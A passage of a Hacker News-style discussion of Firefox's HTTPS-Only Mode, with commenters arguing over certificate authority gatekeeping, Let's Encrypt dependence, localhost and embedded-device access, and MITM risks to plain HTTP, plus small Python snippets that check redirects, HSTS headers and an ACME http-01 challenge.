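    # s.navigate("http://tracker.example/pixel.gif")  # would now raise instead of loading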


A lot of things would be better in theory, like adopting PAKE schemes (such as OPAQUE) that could perform two-way authentication and key negotiation over an insecure connection by just displaying a login prompt.

As always, the issue is adoption. What good is a solution if no browsers implement it? Catch-22, which is usually broken when a giant (Google nowadays) decides to break it. And they need incentives to do so. Which is why we need the non-profit Mozilla giant. Badly.

https://en.wikipedia.org/wiki/Password-authenticated_key_agr...

https://news.ycombinator.com/item?id=18259393

https://tools.ietf.org/html/draft-krawczyk-cfrg-opaque-06


Why deprecate HTTP in the long term? It should simply ask for an annoying user confirmation that takes up the whole screen. Removing my ability to visit the old web is pure nonsense.


Where you see security, I see control. A way to commoditize the launch of ideas and information. Maybe 30 years from now, they will prohibit any type of communication that is not properly licensed and standardized, as they do with commercial imports and exports. In Brazil today, when you buy a product from another state of the federation, the tax goes partly to the state the product is shipped from and partly to the destination where it is purchased.


How does that commoditize the launch of ideas and information?


Introducing a commodity into the cost of a website


When enabled, it forces a domain's certificate to be signed by a CA before the content will be displayed, effectively giving the CA a veto over the content.


I guess, but only in the way your power provider has veto over the content. The CA doesn't care about the content, only about you proving that you own the domain.


Like CAs, the power company can be controlled by the government.

Let's say governments ban youtube-dl. The prosecution gets a court order directing CAs not to renew youtube-dl.org. If they're using a Let's Encrypt-style 90-day certificate, youtube-dl has at most 90 days to comply or be soft-banned from the internet.


Why go to the CA when they can just order the domain itself to be shut down? If there's a court order against you, your site being HTTP won't save you.


Introducing a commodity by-product into the cost of a website


Not every web service is easy to set up with HTTPS via a simple Let's Encrypt setup. Take a game. It dynamically balances between servers rented and destroyed on the fly. It needs a wildcard certificate (issued via a DNS challenge). Then all the sub-servers need to have that wildcard certificate.

In conclusion, deprecating HTTP makes it harder for people to get started on the web. How are you going to get a certificate for an IP address's control dashboard, after all?


Similarly I got stung by Chrome recently.

I have a side project that plays webradio streams. A lot of them don't have HTTPS, some links are even bare IP addresses, and Chrome won't allow me to request them from my HTTPS site. In the end it forced me to create a stream proxy that I have to host...


>It needs a wildcard DNS certificate. Then all the sub-servers need to have that wildcard certificate.

Just give each server a separate domain and certificate as you create them. The matchmaking algorithm returns a url pointing to the server.

>How are you going to get certificates for IP address' control dashboard, after all?

By clicking the damn button?


> Just give each server a separate domain and certificate as you create them. The matchmaking algorithm returns a url pointing to the server.

Do you mean a separate subdomain? (A separate domain would be very expensive.) I would need to figure out how to generate and provision certificates, in that case.


A game absolutely should use HTTPS anyhow, for its own security.

But I'd say that anyone that has an operation so big that it dynamically creates and destroys servers to balance load should probably already be paying for their own wildcard cert anyhow.


> A game absolutely should use HTTPS anyhow, for its own security.

The game has no log-in or sign-up; no account system. The only potentially sensitive data sent is the nickname the user enters.

> But I'd say that anyone that has an operation so big that it dynamically creates and destroys servers to balance load should probably already be paying for their own wildcard cert anyhow.

The game is free and ad-supported. Dynamically creating and destroying servers is a basic requirement.


Wonderful, I'll definitely enable this! I'm pretty surprised it hasn't been a thing for years and isn't the default now.


Good feature in general. A few old sites will get a bit more annoying to use because that fact is now pointed out to the user, but otherwise there's no impact for users.

I hope it does not get too annoying for backend developers running things locally, because locally you typically don't set up HTTPS.


Actually I'm using 3 browsers on my Linux PC:

- Links2 (in graphics mode) — main, for fully no-JS browsing;

- Pale Moon* (in Private mode) — main, for browsing w/ & w/o JS;

- Firefox — for curious reasons if target website is not working in Links2 & Pale Moon.

In the last year I used Firefox maybe twice, as Links2 & Pale Moon cover everything else.

As for Android mobile:

- Termux app + Links2 (in non-graphics mode) — main for fully no-JS browsing;

- Privacy Browser — main, for browsing w/ & w/o JS;

- DuckDuckGo Browser — for curious reasons if target website is not working in Termux/Links2 & Privacy Browser.

P.S. In conclusion, happy to see Firefox is still growing, but every release just brings many "hardcoded" features that, in my opinion, should not be "hardcoded" in a free & open-source browser.


Like others, I'm not exactly inspired by this feature. I'm an advocate for HTTPS-everywhere, but I think we're quickly moving past the point of usefulness for most people.

On a personal level, as a developer, I actually find the ban on mixed connections on a web page much more frustrating. It's easy for me to get a cert for nginx for my side project. It's another thing entirely to figure out how to give my application server access to the certs in the "right" way so that the application can terminate wss:// connections. I have to figure it out, of course, because Firefox will refuse to connect a ws:// connection on an https page.


I don't understand your problem. Nginx should proxy all connections including websocket ones. Just don't expose your application server and use nginx as a reverse proxy.


I don't understand my problem either - if I did, it wouldn't be a problem! I'm not here fishing for tech support, but this is a real thing I'm encountering, and I don't think expressing disbelief is productive.

The point I'm trying to express is that giving a cert to your webserver is often only the first step in a relatively complicated process of securing all your assets. I wish browser makers would ask about blocking insecure connections instead of doing it by default.

If you're interested in the kind of thing I mean see below:

------------------------------------------------------------------------------------------

So, for example - I'm running a quart server on hypercorn for a side project. Just giving nginx the certs will not, for reasons I don't understand, allow a wss:// connection to successfully connect (returns a 400). The developer conversation around this[1] suggests giving the certs to the application server. I can confirm that this works, but again I don't understand why.

[1] https://gitlab.com/pgjones/quart/-/issues/319


It could be because the Host header supplied by nginx to your app server will, by default, be something like 127.0.0.1 instead of yourwebsite.com.


One thing I’ve noticed in HTTPS mode is that sites where I used to lazily type "foobar.com" (resolving to "www.foobar.com" over HTTPS) do not necessarily auto-redirect anymore, instead displaying the scary message first. Whereas typing "www.foobar.com" directly does not trigger the message.

I’m not sure where the auto-switch from "foobar.com" to "www.foobar.com" occurs; if it’s in the browser, ideally Firefox would attempt this auto-correct first and try the HTTPS connection to the corrected location, to minimize the chance of triggering a warning.


The redirect gets sent by the server. foobar.com and www.foobar.com are technically different domains, even if conventionally one should always redirect to the other.
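
You can watch the server do this with a couple of lines of Python and the requests library (example.com is a placeholder; substitute a site whose bare domain redirects to www):

    # Sketch: inspect the redirect chain a server sends for the bare domain.
    import requests

    r = requests.get("http://example.com/", timeout=10)  # follows redirects by default
    for hop in r.history:
        print(hop.status_code, hop.url, "->", hop.headers.get("Location"))
    print("final:", r.status_code, r.url)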


This is great and all--and cheers to HTTPS Everywhere fans throughout this thread, but none of you are answering the question "can I uninstall HTTPS Everywhere now as a result of this feature shipping?"


Do you want the most HTTPS connections you can get with almost no chance of inconvenience? Then use HTTPS Everywhere in the default mode. If you don't mind seeing that you are about to connect to an HTTP site and clicking OK when you want to continue, then yes, you can get rid of HTTPS Everywhere. In this case you will get occasional shocks like "Why is my bank's website giving me an HTTP-only warning? Oh, it is because there is an HTTP-only redirect to the www domain."


In case you are wondering what are the biggest websites that don’t do https by default: https://whynohttps.com/


> Data last updated on 11 Jan 2020 at 23:51 UTC

I wonder if that will get an update next January. I'd also be more interested in a list of popular sites that don't support HTTPS at all, i.e. the sites that will trigger a warning prompt under this new HTTPS-Only Mode.


"we expect it will be possible for web browsers to deprecate HTTP connections and require HTTPS for all websites"

Think about the implications of this. It will be impossible to host any web content unless you get blessed by a well-known CA (packaged in the platform/browser CA store).

That's why we have Let's Encrypt, right? Yes, thanks to them.

Now imagine a future where Let's Encrypt goes away, for whatever reason.

Now it's impossible to host any web content without getting approved by a commercial CA.


Firefox is my primary browser on desktop and Mobile.

On Windows 10, I use Cold Turkey to block distracting websites. I often have issues with Firefox bypassing the blocks on Windows, ignoring the hosts file settings.

On Android, Block Site addons are not compatible with the new Firefox for Android.

I love Firefox, but some recent changes make me feel that I have less control over my browsing experience.

I hope they don't make things 'default' for our 'protection', but rather leave some things for the user to decide according to their preferences.


My blog has no cookies, no JavaScript, no forms, no server-side code, just HTML files. Why should I have to go with HTTPS to avoid this discriminatory treatment?


You ensure that the content you serve is exactly what arrives on the reader's machine.

The most prominent example is ISPs injecting ads or messages. Search for "comcast injecting ads" to see some examples.


That sucks. If I knew my ISP was doing that, I would definitely change it.


This happens on the visitor's end. So it depends on the ISPs of individual visitors of your blog.


Is HTTP (without the S) only risky if you're transmitting data, and not just browsing?


An insecure connection can be trivially eavesdropped (e.g. by your network peers, router, ISP or intermediate hops). Much of the time this will include identifying information such as your IP address and browser cookies. Consider reading medical publications or other personal topics and having that logged by an unrelated third-party. TLS adds significant privacy to your browsing habits, even when not transmitting data, per se.

Edit: and, as others have said, the content can be modified by a man-in-the-middle attacker, which can inject fake content or malware.


No, you're still susceptible to MITM attacks. I could imagine an election info site, that said the election was November 3, being MITM'd by an adversary who changed the page to say November 4, causing many voters to miss the election by a day.


Is there any concern for how much power LetsEncrypt holds over large swaths of the internet in a world where browsers refuse to connect using HTTP?

What prevents LetsEncrypt from censoring entire domains by refusing to renew their short-lived certificate?


Just switch to a different provider for your certs. The startup I previously worked for switched from LetsEncrypt to AWS-provided certificates since we were already using their ALBs.


This is a "rewriting reality to fit our agenda" kind of a post.

> The majority of websites already support HTTPS

When I run a webserver on a machine I just set up, it has no certificate, certainly not one signed by anybody else, and there's no reason I need to be forced to use encryption with it.

> and those that don’t are increasingly uncommon.

False. Although - for fashionable Silicon Valley companies, "most websites" probably means something like Facebook, Google, Amazon, Wikipedia and a few others.

> Regrettably, websites often fall back to using the insecure and outdated HTTP protocol.

HTTP is "outdated"? "Fall back"? ... Seriously?

I guess we're just lucky FF's share has dropped so far that we shouldn't worry about this stuff. I just hope other browsers don't do this (although - who knows, right?)


How many people actually understand what security guarantees HTTPS provides? I remember clicking through warnings not knowing what they meant, or thinking there was nothing I could do about it. Or thinking no one could REALLY snoop except in theory.

And that is the problem.

HTTPS warning messages need reform. How about: "This website and its data are observable and can be spied on by a third party along the network. Please be careful when entering data."


This is why you block DNS selectively at your local gateway AND host a DNS resolver there as well while blocking ALL DNS except to your gateway.

Web browsers have no business using DNS over HTTPS. None; nada; zip.

We've opened a can of worms with DNS-over-HTTPS: it effectively lets malware further evade network detection.


It's obvious I need to spend more time researching Gemini and similar things. The "web" is going to be a true monoculture very, very soon.


I agree. HTTPS is great, and definitely needed for a lot of things. But I don't need my cat pictures encrypted, I don't need lots of things encrypted, and frankly, I don't want things to be encrypted when it's not required; it's a waste of resources, both processing and network.

Then there is the case of all the old computers that lack either the processing power or the support for modern algorithms.


If a page doesn't use HTTPS, even if it is cats, you cannot trust that the traffic has not been modified in transit. You try to load a cat but a network attacker can add malware or mining code or a worse exploit.

Every page needs HTTPS because you can't trust any content sent to you over HTTP. You don't know if it's "just a cat picture."


Only those who control the routing path can modify the cat picture; do you think they can afford to, when the browser does not "run" the cat picture?


Image decoders occasionally have RCE vulnerabilities.


I think the solution in this case is to not execute code in pictures, rather than removing HTTP?

Also, I'm starting to suspect the downvoting feature is used as a sadistic tool, just keeping karma up so you can punish people.


They don't intentionally execute any code; they do sometimes have a vulnerability that allows memory corruption in a way that can be exploited to run attacker-provided code.

If you're not familiar with this omnipresent class of exploit, I wouldn't hope for many people on HN to take your advice on whether a security measure is needed or not seriously. Even if your comments were underlined and flashing on the page instead of grayed out.


I'd be more receptive to this if ISPs weren't snooping on traffic and selling their customers' browsing history. As long as we have to operate under the assumption that every scrap of data we send or request will be picked apart and used against us whenever possible, I'd rather encrypt everything and have a little less to worry about.


Perhaps you should get some better laws in your country to prevent this, instead of ruining the web for the rest of the world?


Sorry to burst your bubble, but intelligence agencies are going to be monitoring your traffic regardless. The Internet is a global network; laws in specific countries or economic zones don't affect data in transit through other parts of the world.


When there's executable code there needs to be encryption.

JS, HTML, CSS, WASM, etc. all need to be tamper-resistant.

Processing power, meh. More of an issue is older devices not getting the updates to software for the newer algorithms, and not getting the updated certificates. I got rid of a perfectly good tablet for just this reason. A bit slow perhaps but workable.


You don't need your cat pictures encrypted per se, but you do want to ensure that your Webportal cannot MITM your communications with catpictures.com and inject malicious javascript into the webpage.


In an adversarial situation, you also want your opponent to spend time and resources storing or cracking gigabytes of cat pictures for every kilobyte of email they get.


Here is the thing. If you enter domain.com into the address bar of your browser, your browser will always go to the HTTP site first unless the domain is HSTS-preloaded. Your first visit to a website is not secured by HTTPS. So lots of people do an HTTP -> HTTPS redirect, which means you can do a man-in-the-middle attack on the HTTP port, and the HSTS header will never get loaded in the first place. HTTPS is significantly less effective than it should be.
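
If you want to check how a particular site handles this, a small requests-based sketch (example.com is a placeholder) shows both the insecure first hop and whether an HSTS header is sent at all:

    import requests

    # The very first plain-HTTP request is the exposed one.
    plain = requests.get("http://example.com/", allow_redirects=False, timeout=10)
    print("http first hop:", plain.status_code, plain.headers.get("Location"))

    # HSTS only helps after the browser has seen this header once (or via preload).
    secure = requests.get("https://example.com/", timeout=10)
    print("HSTS header:", secure.headers.get("Strict-Transport-Security"))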


> I don't need my cat pictures encrypted

As if all images are of cats, or as if it's easy to tell when something is sensitive and when it's not.


Using https is making the web a monoculture?


It obviously is. Having just an HTML site now becomes more expensive for no clear reason, which makes it more sensible for people to check out Gemini.


What makes it more expensive? A certificate is free (With LE or self-signed), the performance impact is negligible and there's a clear reason for why everyone should be using it.


It does add a "tax" of sorts, in the form of time or attention that must be paid to keep a website up. You can't just sling some files in a directory and be done -- you have to pay for certificates or pay (in time and executable capability) to keep Let's Encrypt certificates up to date.

And, as wonderful as Let's Encrypt is, it's not forever. At some point, they're gonna get tired of messing with it, or it will get taken over by private equity (see .org) and, for whatever reason, it won't work any more.

And sure, that's always been true; new stuff obsoletes old and things fall by the wayside. But my current browser can access modern websites as well as sites from the dawn of the Web. But Firefox 85, 87 or 90 will probably make HTTPS mandatory -- and that amazing continuity is gone.


There are good reasons to insist on the use of HTTPS for all sites on the public web, with no exceptions or excuses. This topic has cropped up before:

https://news.ycombinator.com/item?id=21912817

https://news.ycombinator.com/item?id=24640183

https://news.ycombinator.com/item?id=22147858


These links list literally SOME and not ALL cases that need encryption.


I'm afraid I don't see your point here, please elaborate.


Your point is "this should be applied to ALL sites", while your argument for it is "because it is relevant for SOME sites".


Not so. In the top link, points 2, 3, and 5, apply to all public websites.


You cannot say that certificates are reliably free (especially in the long run), if there's only one entity providing them and that entity is dependent on corporate sponsors.


Tons of major websites rely on Let's Encrypt, so I think it's fair to say that they're probably not going anywhere soon. Free certificates are now standard on services like Cloudflare and Google App Engine. I think that AWS can generate free ones too.


We can't say that a true statement is true just because there's a chance that at some point it becomes false?


By that logic, Lehman Brothers stock was a great investment on 14 September 2008.


Not everyone needs HTTPS, in spite of what the HN mantra says.

Some websites are the equivalents of billboards.

The cost is dependence on a central authority that can make your site inaccessible on a whim.


You're aware that Gemini mandates a recent version of TLS in the protocol specification, right?


Self-signed certificates are first class citizens. Section 4.2 of the spec.


It's part of the culture of making everything on the web terribly complicated, which has resulted in the death of all but three web browsers.

It's now practically impossible to write a new web browser from scratch, unless you're a mega corp with endless resources and a grudge against Google, and they're still adding more complexity every day.


The web started out as a very optimistic project with no security and a lot based on trust. As it evolved a lot of security had to be bolted on which now makes it a bit more complicated than in the early days. But what's the alternative?

Of course a perfect protocol where nothing needs to be added later would be great, but that's not very realistic.


The problem isn't just HTTPS, it's the ever-expanding array of APIs and technologies that "must" be implemented to be a "real" or "complete" browser. Even Firefox, which has been around for a long time and has a fairly large mind share, is at best an afterthought in many web projects.

The number of APIs that need to be implemented to be considered even a basic web browser is so huge that it's not an approachable project for just about any organization, and as an individual it's just not possible.


Supporting TLS is a cakewalk compared to handling modern HTML/JS/etc. This has nothing to do with the browser monoculture.


Gemini is a monoculture. They almost say it in the FAQ:

> 2.5 Why not just use a subset of HTTP and HTML?

> [...] The problem is that deciding upon a strictly limited subset of HTTP and HTML, slapping a label on it and calling it a day would do almost nothing to create a clearly demarcated space where people can go to consume only that kind of content in only that kind of way. [...]

The protocol itself has very strong opinions on what is allowed and what is not. It is simple but mandates TLS (so, not simple), because authors think encryption is important but other things are not. It is also deliberately non-extensible.

Not saying it is a bad thing, I mean, they didn't hurt anyone. But that protocol is clearly intended as a rallying point for like-minded individuals rather than something for everyone to use.


I have been using HTTPS Everywhere for some time. The worst are sites which have HTTPS but not configured properly: a cert for the wrong domain, or an expired one.


The Firefox versioning numbers are lost on me.

I have no idea how important the difference between 83 and 80 is.


83 - 80 = 3

Therefore version 83 is 3 versions ahead of version 80. Note that "version" in this context is shorthand for "major version". It does not include minor patches that only fix a bug or security issue.

Each new major version of Firefox comes with new features and may occasionally deprecate or remove old features. They are currently released roughly every 4 weeks.


cant wait to restart the browser when im in the middle of something important


As long as there is an escape hatch, this is great. I absolutely loathe having to set up HTTP-to-HTTPS redirects because it means the first visit for many users is completely unsecured. HSTS preloading is a hack. Why not just connect to HTTPS first?


What happens if I need to access localhost over HTTP?


You could start by reading the article, even only the first paragraph:

> Firefox asks for your permission before connecting to a website that doesn’t support secure connections.


It could be a bit smarter and detect if the connection is to a local server.


No need for snark. It's a legit question and buildfocus's answer below is relevant:

"browsers generally treat localhost and/or 127.0.0.1 as secure origins in themselves anyway"


I have read it, I was wondering about localhost explicitly.


As other posters mention, you can disable this when you need to, but also browsers generally treat localhost and/or 127.0.0.1 as secure origins in themselves anyway, so I suspect that won't be necessary. See https://developer.mozilla.org/en-US/docs/Web/Security/Secure...:

> Locally-delivered resources such as those with http://127.0.0.1 URLs, http://localhost and http://*.localhost URLs (e.g. http://dev.whatever.localhost/), and file:// URLs are also considered to have been delivered securely.


As described in the article HTTPS-Only mode is opt in, you can also disable it at will, you can add exceptions on a site-by-site basis, and even when it's on you are prompted on whether or not you wish to proceed to non-HTTPS sites.


My guess is that either there's a built-in rule for that, or you can just click the "Continue to HTTP Site" button like in the screenshot.


It's explained in the post:

> For the small number of websites that don’t yet support HTTPS, Firefox will display an error message that explains the security risk and asks you whether or not you want to connect to the website using HTTP. Here’s what the error message looks like: ..


"Firefox asks for your permission before connecting to a website that doesn’t support secure connections."

That suggests it will ask you for permission, presumably with a "always remember this choice" option.


It would help greatly if this kind of thing (that, and security exceptions) did not apply to any host in the RFC 1918 address space. It would make life easier for IT departments around the world.


From the article: Firefox asks for your permission before connecting to a website that doesn’t support secure connections.


It will probably be a hardcoded exception, just like for enabling microphone/webcam access and other features today.


To add to this: what interests me is how they will handle accessing the management interface of routers and various network equipment once HTTP gets deprecated.


Just tried it after enabling the feature - No message, accessing localhost works just fine over http.


...and I still still http-only sites from time to time.


Your post is brief, and has a grammar error that makes it harder to understand.


the second "still" is meant to be "sell" or "make".


That helps a bit. I could be wrong, but I think the common belief is that professionally-developed HTTP-only sites don't really have a place anymore on the 2020s internet due to HTTP/2, security, referral tracking, and SEO limitations.


I think it means "see"


That makes a lot more sense than my suggestions.


Upon launch, Firefox 83 displays essentially a full-page ad for Pocket, with a tiny link at the bottom (have to scroll to it) to get the release notes for “what else” is new in Firefox.

So all kinds of significant enhancements in 83, including HTTPS mode, might essentially be missed by most users. (Heck, I only knew because of this HN post.)

Why do programs insist on “hijacking” things? Release notes seem particularly vulnerable to this, e.g. iPhone apps love to have “notes” that don’t actually tell you anything at all, just marketing-speak.


There had better be an about:config option to turn this stupidity off.

Perhaps one of the downvoters can explain why the implied opinion "Nobody should be able to access your site without clearance from a third-party gatekeeper" belongs on a site called "Hacker News."

And no, it won't be opt-in for long. Read the rest of the page: "Once HTTPS becomes even more widely supported by websites than it is today, we expect it will be possible for web browsers to deprecate HTTP connections and require HTTPS for all websites. In summary, HTTPS-Only Mode is the future of web browsing!"

This is something you should be speaking up against.


> Perhaps one of the downvoters can explain why the implied opinion "Nobody should be able to access your site without clearance from a third-party gatekeeper" belongs on a site called "Hacker News."

I didn't vote down, but ironically this is bad news for real hackers, who will have a harder time doing MITM downgrade attacks once this is widespread.

I believe that web browsers should alert users if a website uses a less secure protocol than "nearly all" of the rest of the websites they visit, for some value of "nearly all".

It's not preventing the user from visiting, just saying "heads up, the assumptions you make about the websites you visit don't hold for this one."


Which means any pure-HTML resources would either have to rely on Let's Encrypt or pony up some certificate money. So basically a death knell for homepages.


Why does relying on Let’s Encrypt entail the death knell for homepages? I respect the whole gatekeeping argument, but homepages will still be around.


Because relying on only a single entity, sponsored by corporations, to protect people from corporate gatekeeping seems like a dumb idea in the long run.


Especially if the displayed warning looks like a "ThIs Is An InSeCuRe SiTe" warning. Self-signed cert? WaRnInG!!!111eleven No https? WaRnInG!!!111eleven Cert expired 2 hours ago? WaRnInG!!!111eleven


HTTPS is not about gatekeeping; you can use Let's Encrypt for free certificates for any domain.

HTTPS-only is about forcing all traffic to be encrypted by banning clear-text traffic. I've been using the "HTTPS everywhere" extension for years and it's great.


Yes it is. Someone has to give you a certificate which the user's browser accepts, even if it's free today.

Let's say there's a simple website which someone uses to display some holiday pictures. Why would we need HTTPS here, if there is no login or anything like that?

It just adds an extra hurdle for not-so-tech-savvy users and accelerates the trend toward abolishing small private websites.


I don't know. Let's say that some non-technical family member goes to this site intending to look at vacation pictures.

Imagine if those pictures have been replaced by something else. If you can't think of a long list of replacement images that could be very useful for a spearphishing attack, then you don't have enough imagination.

This attack could also be used to get the poster of the photos in trouble.


If my choices are to implement a security control which forces a layer of security, or forgo that security control so Alice can upload her Holiday pictures to a host which doesn’t support HTTPS either, I know which one I’ll pick. Alice should either host her photos on Instagram, or learn how to run letsencrypt.

The day where certs are no longer freely obtainable is the day another self governed free TLS provider will appear and force their way into the market by providing installers to inject CAs into system cert stores.

There’s always TOR if you disagree.


> Alice should either host her photos on Instagram, or learn how to run letsencrypt.

Both leading to further centralisation of the Internet.

> by providing installers to inject CAs into system cert stores

That's already pointless on Android, user-installed CAs are ignored by default unless an app developer opts in to using them.

Once we go down this path there's no turning back to the user-centric Web of the 1990s / 2000s


> That's already pointless on Android, user-installed CAs are ignored by default unless an app developer opts in to using them.

And? App developers should opt in to ignoring transport security. I’m sure a bunch of Android shitware attempts to install CAs either via user interaction or exploitation.

> Once we go down this path there's no turning back to the user-centric Web of the 1990s / 2000s

The landscape we live in now is very different from then. I’m all for a free web, but not at the cost of security. The web is now a multi-trillion-dollar industry. Weakening security just so Bob can see Alice’s holiday pics in a situation where Alice can’t figure out letsencrypt is, frankly, unhinged.

If you want a ‘free web’ you’re welcome to disable any HTTPS enforcement and disable TLS cert checking entirely. Hell, fork a browser, be very clear about the security weaknesses and publish on github if you feel that strongly, I’ll even star it for you.


The web is now a multi-trillion-dollar industry.

Maybe your web service is, but mine isn't. Mine is a specialized embedded device server that now has an expiration date for no reason on God's green earth.


Feel free to fork Mozilla codebases if you disagree with fundamental security concepts.


As a visitor to the website, how can I be sure it's only holiday pictures? If I get to your friendly website and it asks me for private information, and I'm willing to give it because I trust you, what tells me only you will receive it? How do I know it's your holiday pictures, and not some scam someone else wants to trick me into?


Here's a novel idea: how about popping up scary warnings when an insecure site asks for information, as opposed to if the insecure site merely exists?

Static content does not need https unless there are reasons for privacy or MiTM concerns related to the nature of the content itself.


But you don't know if it's the real content. There's a problem even before entering information. What tells me it's your holiday pictures and not someone else's, placed by a person in the middle who wants to tarnish your name? What if your ISP/your hosting provider injects ads into the page, or a MITM adds a link to a scam site?


Of all the parts involved in setting up a web server, is adding Let's Encrypt a significant further barrier? In what situation would a non-tech-savvy user ever be doing that in the first place?


Hint: not all web servers run inside Facebook or Google or Amazon data centers. Some of them run inside individual devices, which will now end up in the landfill once their certificates expire. Many such devices were, and are, just fine running plain old HTTP, but now they're all going to be subject to service life limits imposed by a third-party authority.

This is not how this was supposed to work. This is not how any of this was supposed to work. But it's hard to voice any objections over the proverbial thunderous applause.


I can MITM that site and add a login form or arbitrary content.


> HTTPS-only is about forcing all traffic to be encrypted by banning clear-text traffic

Banning clear text might work for browsers, but it would break ACME clients that rely on plain HTTP (the http-01 challenge) to validate a certificate request from Let's Encrypt.
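
For reference, the http-01 challenge being referred to works by the CA fetching a token over plain HTTP on port 80 (dns-01 and tls-alpn-01 are alternatives that don't need it). A minimal sketch, with the token and account thumbprint as placeholders that a real ACME client would supply:

    # Sketch of why ACME http-01 needs plain HTTP: the CA fetches
    # http://<domain>/.well-known/acme-challenge/<token> over port 80.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    TOKEN = "example-token"                    # placeholder, supplied by the ACME client
    THUMBPRINT = "example-account-thumbprint"  # placeholder

    class ChallengeHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path == "/.well-known/acme-challenge/" + TOKEN:
                body = (TOKEN + "." + THUMBPRINT).encode()  # the key authorization
                self.send_response(200)
                self.send_header("Content-Type", "text/plain")
                self.end_headers()
                self.wfile.write(body)
            else:
                self.send_error(404)

    # HTTPServer(("", 80), ChallengeHandler).serve_forever()  # port 80 needs privileges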


You can use Let's Encrypt... until you can't. And then, after all browsers have deprecated HTTP, it will be time to seriously squeeze all website owners for certificate money. It is pretty brilliant, if you ask me.


Turn what stupidity off? The menu item that you can use to opt in to it?


Did you read the article? It clearly states it's opt-in.


At first it's opt-in, then it becomes the default setting. Are you a developer? If you are, then you should be used to thinking at least 2 steps ahead and not just seeing what's literally visible in front of you.


I kind of agree; I don't want to have to click through warnings all the time to do my job. Just re-architect everything to have legit public domain names and network access so I can get a Let's Encrypt cert? Yeah right, I'll get right on that.



